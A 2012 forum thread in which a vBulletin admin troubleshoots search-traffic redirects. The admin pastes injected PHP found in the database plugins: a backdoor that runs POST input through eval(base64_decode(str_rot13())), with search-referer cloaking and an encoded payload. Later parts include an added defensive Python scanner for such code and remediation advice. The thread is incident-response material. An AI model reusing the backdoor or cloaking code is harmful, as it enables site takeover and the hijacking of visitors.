vbulletin/vbseo hacked?

  #1  
Old 02-28-2012, 06:53 AM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15

vbulletin/vbseo hacked?


Hello,

I have a very strange problem with my vBulletin board (3.8.7). The problem is that Google clicks to my forum are redirected to MyFileStore.com. I read everything on the vBSEO and vBulletin boards and reinstalled vBSEO, which is supposedly causing the problem. But today the problem came back.

Any ideas?



  #2  
Old 02-28-2012, 07:35 AM
AmethystNetworks AmethystNetworks is offline
Junior Guru Wannabe
 
Join Date: Feb 2012
Posts: 60
Have you tried contacting vB about the issue? There may be a known exploit that they have a security patch for.

  #3  
Old 02-28-2012, 11:57 AM
KMyers KMyers is online now
Technical Nutcase
 
Join Date: Mar 2009
Location: Miami, Florida
Posts: 18,533
Hello,
Are you sure it is not an issue with your machine? I have seen rogue anti-viruses and adware redirect Google searches. Can you try it on another computer?

__________________
Keith M.- CTO
VPS | Cloud Resource Pools | Dedicated Servers | Colocation
99.999% Uptime | 24x7x365 Support | onApp Powered Cloud | Global Data Centers
Big Brain Global Networks | A Division of Big Brain, LLC

  #4  
Old 02-28-2012, 12:06 PM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
This sounds like that vBSEO exploit from months ago. Are you sure you run the latest available versions?

  #5  
Old 02-28-2012, 01:24 PM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15
Quote:
Originally Posted by cpanellover View Post
This sounds like that vBSEO exploit from months ago. Are you sure you run the latest available versions?
I thought the same, so I reinstalled vBSEO three days ago. But today I saw the redirection again.

  #6  
Old 02-29-2012, 01:49 AM
philipdaniel philipdaniel is offline
Web Hosting Master
 
Join Date: Aug 2011
Posts: 720
There is a Support section at vBSEO, so you can discuss your problem there. I agree with KMyers. There is some free software and antivirus which redirects Google searches to particular sites.

  #7  
Old 02-29-2012, 03:40 AM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
Hi,

1) Check vbulletin.com for security patches
2) Temporarily disable custom plugins
3) Redirection gone? Good. Not gone? Well...
4) You have a problem on the server that needs to be investigated by somebody with full access

  #8  
Old 02-29-2012, 01:09 PM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15
My admin just found this code in MySQL (datastore, plugins)

Code:
if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
{
        $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
        foreach($s as $e)
        {
                if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
                {
                        $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
                        die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl

Is this related to any known issue?
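
A defender-side check for this kind of finding, added here as an example and not part of the original post or of vBulletin/vBSEO: it scores PHP stored in exported plugin or datastore records against the traits visible in the snippet above. The record names, weights and threshold are assumptions, and the sample rows are constructed.

```python
import re

# Weighted indicators drawn from the snippet posted above (regexes over PHP source).
# Weights and the threshold below are assumptions chosen for this example.
INDICATORS = [
    ("eval of decoded data", 5, r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
    ("request data reaches eval", 5, r"eval\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)"),
    ("packed payload", 4, r"gzinflate\s*\(\s*base64_decode\s*\("),
    ("error logging disabled", 2, r"ini_set\s*\(\s*['\"](display_errors|log_errors)['\"]\s*,\s*0"),
    ("search-referer check", 2, r"HTTP_REFERER"),
    ("crawler cloaking", 2, r"gethostbyaddr|msnbot"),
    ("bare base64_decode", 1, r"base64_decode\s*\("),
]
COMPILED = [(n, w, re.compile(p, re.I)) for n, w, p in INDICATORS]

def score(code):
    """Return (total weight, names of matched indicators) for one PHP blob."""
    hits = [(n, w) for n, w, rx in COMPILED if rx.search(code)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def scan(rows, threshold=5):
    """rows: (location, php_source) pairs; return those at or above threshold, worst first."""
    found = []
    for location, code in rows:
        total, names = score(code)
        if total >= threshold:
            found.append((location, total, names))
    return sorted(found, key=lambda f: -f[1])

# Constructed sample rows; the locations are hypothetical names for exported records.
SAMPLE_ROWS = [
    ("plugin:welcome_banner", "$banner = htmlspecialchars($vbulletin->options['bbtitle']);"),
    ("plugin:avatar_import", "$img = base64_decode($row['avatar_b64']); // legitimate use"),
    ("plugin:unknown_hook",
     "if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);\n"
     "ini_set('display_errors',0);ini_set('log_errors',0);\n"
     "$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');\n"
     "$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);"),
]

if __name__ == "__main__":
    for location, total, names in scan(SAMPLE_ROWS):
        print(f"{location}: score {total}: {', '.join(names)}")
```

A lone `base64_decode` call scores below the threshold, so ordinary plugins that decode data are not flagged; it is the combination with `eval`, request input and referer or crawler checks that marks a record for review.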

  #9  
Old 02-29-2012, 01:28 PM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
That is exploit code. Disable the base64_encode and base64_decode PHP functions in php.ini. Do remember that vBulletin uses those itself on upgrades/installs, so you need to re-enable them if you are going to upgrade/install. Also set "register_globals = off" in php.ini. Restart the server after editing php.ini. The "@" you see before PHP function calls causes that script to throw no error message if the function fails. Also, have you seen this:

http://www.vbseo.com/f5/vbseo-securi...3/index12.html


Last edited by cpanellover; 02-29-2012 at 01:35 PM.
  #10  
Old 02-29-2012, 02:55 PM
mikewiz mikewiz is offline
Newbie
 
Join Date: May 2011
Posts: 15
1.) So if this "virus code" is in "datastore", then if I disable/enable any plugin, the datastore will be cleared and the "virus code" will vanish?

2.) But from what I understand, it will come back and attach the "virus code" again. So how do I find its source and delete it completely?

Do I understand that correctly?


Last edited by mikewiz; 02-29-2012 at 03:01 PM.
  #11  
Old 02-29-2012, 03:10 PM
cpanellover cpanellover is offline
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
Quote:
Originally Posted by mikewiz View Post
1.) So if this "virus code" is in "datastore", then if I disable/enable any plugin, the datastore will be cleared and the "virus code" will vanish?

2.) But from what I understand, it will come back and attach the "virus code" again. So how do I find its source and delete it completely?

Do I understand that correctly?
The best thing you can do is contact vBulletin support; the creators of the product are the most qualified to tell you how to deal with this. It's possible it comes back, but be careful with the datastore: if you do anything wrong it might corrupt your database and your board will stop working. Ask Steve at vbulletin.com; he is very smart with things like this. It might not be vBSEO; look here. What YUI library version are you running? Try in your vBulletin control panel:

  1. Admin CP >> Settings >> Options >> Server Settings and Optimization Options
  2. Scroll down to Use Remote YUI
  3. Set this to Google


Last edited by cpanellover; 02-29-2012 at 03:16 PM.
  #12  
Old 03-03-2012, 09:59 AM
Xarwin Xarwin is offline
Junior Guru Wannabe
 
Join Date: Mar 2012
Posts: 31
Also have a check on your .htaccess file.
It might be vulnerable.
